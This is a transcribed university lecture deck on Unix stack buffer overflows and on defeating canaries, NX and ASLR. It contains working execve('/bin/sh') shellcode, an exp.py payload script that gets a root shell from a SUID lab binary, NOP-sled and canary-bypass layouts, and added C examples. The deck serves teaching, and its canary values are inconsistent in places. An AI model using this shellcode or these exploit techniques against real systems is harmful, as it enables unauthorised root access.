unix application buffer overflow

Upload: aramissii

Post on 01-Jun-2018


  • 8/9/2019 Unix Application Buffer Overflow

    1/54

    UNIX SECURITY

    BATTLE OF

    PROTECTIONS VS EXPLOITATIONS

    Ammarit Thongthua

    Mahidol University, Master degree of Cyber Security and Information Assurance

    AGENDA

    Introduction: Vulnerable Unix application

    Memory Space and Stack Layout

    Buffer Overflow

    Unix application Reverse Engineer

    Shell Code

    Protection vs Exploitation: Basic Stack without protection (Demo)

    Bypass password protection; Exploit to get root privilege

    Limited Stack Space (Demo)

    StackGuard (Canary) (Demo)

    Non-Executable-Stack (NX) (Demo)

    Address Space Layout Randomization (ASLR): Defeat with static system library (kernel < 2.6.20) (Demo)

    ASLR with removed static system library: Defeat with application wrapping (kernel >= 2.6.20) (Demo)

    VULNERABLE UNIX APPLICATION

    Has permission "root" as user or group

    SUID or SGID is set (the "s" flag at the execute bit). These 2 criteria together provide privilege escalation to root.

    VULNERABLE UNIX APPLICATION

    Uses a vulnerable standard input function, e.g. strcpy(), gets()

    These make it possible for the program to segmentation fault (buffer overflow)

    MEMORY ADDRESS AND STACK LAYOUT

    char pw[608];

    [Diagram: process memory map from 0xFFFFFFFF (top) down to 0x00000000: Stack, Heap, BSS Segment, Data Segment, Code Segment. The locals char pw[608]; and int i = 0; live on the Stack.]

    [Diagram: stack layout with high addresses at the top: previous stack frames and the main() frame, then the checkpw() frame holding its locals int i = 0; and char pw[608];, followed by SFP (saved frame pointer) and RP (return pointer).]

    BUFFER OVERFLOW

    The situation when the data input to the system is larger than the size of the buffer that was declared to hold it.

    Ex: char pw[608];

    [Diagram: 607 bytes of "A" followed by \x00 fit inside pw; SFP and RP are untouched.]

    [Diagram: 616 bytes of "A" followed by \x00 run past pw: SFP = 0x41414141 and ***RP = 0x41414141, so the function returns to 0x41414141 and the process dies with Segmentation fault or Illegal Instruction.]

    BUFFER OVERFLOW

    [Diagram: 612 bytes of "A": SFP = 0x41414141 is overwritten, but ***RP = 0x080484c7 is still the original return address; the result is again Segmentation fault or Illegal Instruction.]
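    The deck's vul_app is not reproduced in the transcript. As an added example (not the author's code), here is the shape of a checkpw() built on the unbounded strcpy() the deck names, beside a bounded version that refuses any input that cannot fit in the 608-byte pw buffer; PW_EXPECTED is a constructed sample value.

```c
#include <stdio.h>
#include <string.h>

#define PW_LEN 608               /* the deck's char pw[608] */
#define PW_EXPECTED "s3cret"     /* constructed sample password, not from the deck */

/* Vulnerable form, as the deck describes it: strcpy() copies until the NUL
 * in input, so anything of 608 bytes or more runs past pw into the saved
 * frame pointer (byte 609) and the return pointer (byte 613).
 * Shown only for contrast; never call it on untrusted input. */
int checkpw_unsafe(const char *input)
{
    char pw[PW_LEN];
    strcpy(pw, input);
    return strcmp(pw, PW_EXPECTED) == 0;
}

/* Hardened form: returns 1 on match, 0 on mismatch, -1 when the input has
 * no NUL within PW_LEN bytes, i.e. it could never fit in pw. */
int checkpw_bounded(const char *input)
{
    char pw[PW_LEN];
    const char *end = memchr(input, '\0', PW_LEN);
    if (end == NULL)
        return -1;                            /* too long: refuse instead of overflowing */
    memcpy(pw, input, (size_t)(end - input) + 1);   /* copy including the NUL */
    return strcmp(pw, PW_EXPECTED) == 0;
}

/* Reads one line from stdin the way a fixed vul_app should: fgets() is
 * bounded, and a missing newline means the line was longer than the buffer. */
int main(void)
{
    char line[PW_LEN + 2];                    /* room for 608 chars, '\n' and NUL */
    if (fgets(line, sizeof line, stdin) == NULL)
        return 1;
    char *nl = strchr(line, '\n');
    if (nl == NULL) {                         /* truncated: the rest is still in stdin */
        fputs("input too long\n", stderr);
        return 1;
    }
    *nl = '\0';
    int rc = checkpw_bounded(line);
    puts(rc == 1 ? "access granted" : "access denied");
    return rc == 1 ? 0 : 1;
}
```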

    BUFFER OVERFLOW

    Demo #1

    Bypass password protection

    BUFFER OVERFLOW

    [Diagram: [Malicious Machine OpCode] + [PADDING]: SFP = 0x41414141, ***RP = 0xFBFF0544, pointing back at the opcode placed in the buffer.]

    The attacker can control the return pointer so that it runs malicious machine opcode placed in memory (shell code).

    Inserting the shell code as part of the input reduces the complexity of the exploitation.

    SHELL CODE

    Shell code is the code that the attacker wants the system to run in order to execute the command the attacker needs (created from assembly and converted to opcode).

    Ex: Open a port for connection to that system with root privilege; add a user to the system; run a shell with root privilege.

    Shell code is written in hexadecimal format.

    SHELL CODE

    Assembly Code -> Op Code -> Shell Code: execve(/bin/sh)

    31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 b0 0b cd 80


    SHELL CODE

    Where can we get shell code to use in an exploit?

    Create your own shell code (quite time-consuming)

    Use Metasploit to generate shell code (Meterpreter)

    Search the internet: shell-storm.org/shellcode, packetstormsecurity.com, www.exploit-db.com/exploits


    EXPLOIT CODE

    Exp = Shellcode + PAD + RP

    [Shell Code] + [PADDING to make size 612] + [RP]
    612 bytes                                   4 bytes

    SFP = 0x41414141, ***RP = 0xBFFFF520

    EXPLOIT CODE

    exp.py as shown on the slide. The transcript drops the "\xff" byte of RP and the F digits of its comment; they are restored here from the little-endian encoding of the 0xBFFFF520 address used on the neighbouring slides, and the assembly of the payload follows the Exp = Shellcode + PAD + RP formula of the previous slide:

        import sys

        # execve("/bin/sh") shell code from the SHELL CODE slide, 23 bytes
        shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                     b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

        RP = b"\x20\xf5\xff\xbf"  # 0xBFFFF520, little-endian

        # Exp = Shellcode + PAD + RP: pad to 612 bytes (608-byte pw + 4-byte SFP), then RP
        exp = shellcode + b"A" * (612 - len(shellcode)) + RP
        sys.stdout.buffer.write(exp)

    user@host:$ python exp.py | ./vul_app

    EXPLOIT CODE

    Sometimes the result of our exploit is a crash!!!

    What happened?

    [Diagram: [Shell Code] + [PADDING to make size 612] with RP = 0xBFFFF520; the 4-byte RP has to land exactly on the start of the shell code.]

    EXPLOIT CODE

    [Shell Code] + [577 bytes of PADDING], RP = 0xBFFFF520

    becomes

    [400 B. landing space] + [Shell Code] + [177 B. PADDING], RP = 0xBFFFF540

    NOP (\x90) = Do nothing


    EXPLOIT CODE

    When the exploit succeeds

    BASIC STACK WITHOUT PROTECTION

    Demo #2

    Exploit to get root privilege


    LIMITED STACK SPACE

    [Diagram: ***RP = 0xBFFFF7B0]


    TODAY

    Bypass limited stack space by ret-2-libc

    StackGuard (Canary) and Defeat

    Non-Executable-Stack (NX) and Defeat

    Address Space Layout Randomization (ASLR): Defeat with static system library (kernel < 2.6.20)

    ASLR with removed static system library: Defeat with application wrapping (kernel >= 2.6.20)


    BYPASS LIMITED STACK SPACE BY RET-2-LIBC

    Find the location of the "system" call function


    STACK GUARD (CANARY) DEFEAT

    Both the NULL canary and the Terminator canary can be defeated by "Canary repair".

    NULL canary: only when the app uses the gets() function

    AAA…AAA 00000000 AAAA RP x0x0x0x Shellcode x0a

    Terminator canary (always 0x00000af): when the app uses the gets() function, or when the app uses the strcpy() function and needs more than 1 arg

    Arg1 = AAA…AAAAAAA 0af AAAA RP x0x0x0x Shellcode 00

    Arg2 = BBB…BBBBB 00

    Arg3 = CCC…CCC 00

    Result: AAA…AAA 00000af AAAA RP x0x0x0x Shellcode
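    To make the canary slides concrete, this added example (not from the deck) models a StackGuard-protected frame as a byte array: local buffer, 4-byte canary, 4-byte RP. It shows the epilogue check catching a plain overflow, a strcpy()-style copy being stopped by the NUL inside a terminator canary, and a gets()-style copy carrying NUL bytes through so that a NULL canary is written back intact while RP is replaced. The frame layout, the 16-byte buffer and the random canary value are constructed; 0x000aff0d is the terminator value StackGuard documents; little-endian memory is assumed.

```c
#include <stdint.h>
#include <string.h>
/* Constructed model of a StackGuard-protected frame (not a real compiler
 * layout): 16-byte local buffer, then the 4-byte canary, then the 4-byte
 * return pointer RP. Little-endian byte order is assumed. */
#define BUF_LEN    16
#define CANARY_OFF BUF_LEN
#define RP_OFF     (BUF_LEN + 4)
#define FRAME_LEN  (BUF_LEN + 8)

typedef struct { unsigned char bytes[FRAME_LEN]; } frame_t;

/* Set up the frame with a given canary and return pointer, buffer zeroed. */
static void frame_init(frame_t *f, uint32_t canary, uint32_t rp)
{
    memset(f->bytes, 0, FRAME_LEN);
    memcpy(f->bytes + CANARY_OFF, &canary, sizeof canary);
    memcpy(f->bytes + RP_OFF, &rp, sizeof rp);
}

/* strcpy()-style overflow: copies until the first NUL in src, then writes its
 * own NUL. Bounded to the frame so the model itself never misbehaves. */
static void copy_strcpy(frame_t *f, const char *src)
{
    size_t i;
    for (i = 0; i < FRAME_LEN && src[i] != '\0'; i++)
        f->bytes[i] = (unsigned char)src[i];
    if (i < FRAME_LEN)
        f->bytes[i] = 0;
}

/* gets()-style overflow: stops only at a newline, so NUL bytes are copied. */
static void copy_gets(frame_t *f, const unsigned char *src, size_t len)
{
    for (size_t i = 0; i < len && i < FRAME_LEN && src[i] != '\n'; i++)
        f->bytes[i] = src[i];
}

/* The check StackGuard emits before `ret`: 1 = canary untouched,
 * 0 = frame smashed (the real instrumentation aborts instead of returning). */
static int canary_intact(const frame_t *f, uint32_t canary)
{
    return memcmp(f->bytes + CANARY_OFF, &canary, sizeof canary) == 0;
}

/* Return pointer as the epilogue would load it. */
static uint32_t frame_rp(const frame_t *f) { uint32_t rp; memcpy(&rp, f->bytes + RP_OFF, sizeof rp); return rp; }
```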


    ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR)

    Technique used to prevent an attacker from jumping to a particular piece of exploited code in memory, by randomizing the virtual addresses at every runtime.

    ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD

    If the OS kernel has some static lib, use a JMP ESP instruction in that static lib to bring RP to the shell code.

    [Diagram: AAAAAAAAAAAAAAAAAAAAAAA RP \x90\x90\x90\x… [shell code]; RP points at JMP ESP in the static lib, and esp points into the NOP sled in front of the shell code.]

    [Disassembly fragment of the static lib: INC EAX; ADD EBS, EBP; ...]

    ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD

    If the OS kernel has no static lib, we need to write an application that calls the vulnerable application to limit the random address space (App wrap up).

    [Diagram: AAAAAAAAAAAAAAAAAAAAAAAAA RP \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x [shell code]]

    Check the current ESP value and set RP = ESP + [vul app buffer]


    REFERENCE

    Protecting Against Address Space Layout Randomization (ASLR) Compromises and Return-to-Libc Attacks Using Network Intrusion Detection Systems. David J. Day, Zheng-Xu Zhao, November 2011, Volume 8, Issue 4, pp 472-483.

    Cowan, C. Buffer Overflow Attacks: StackGuard.
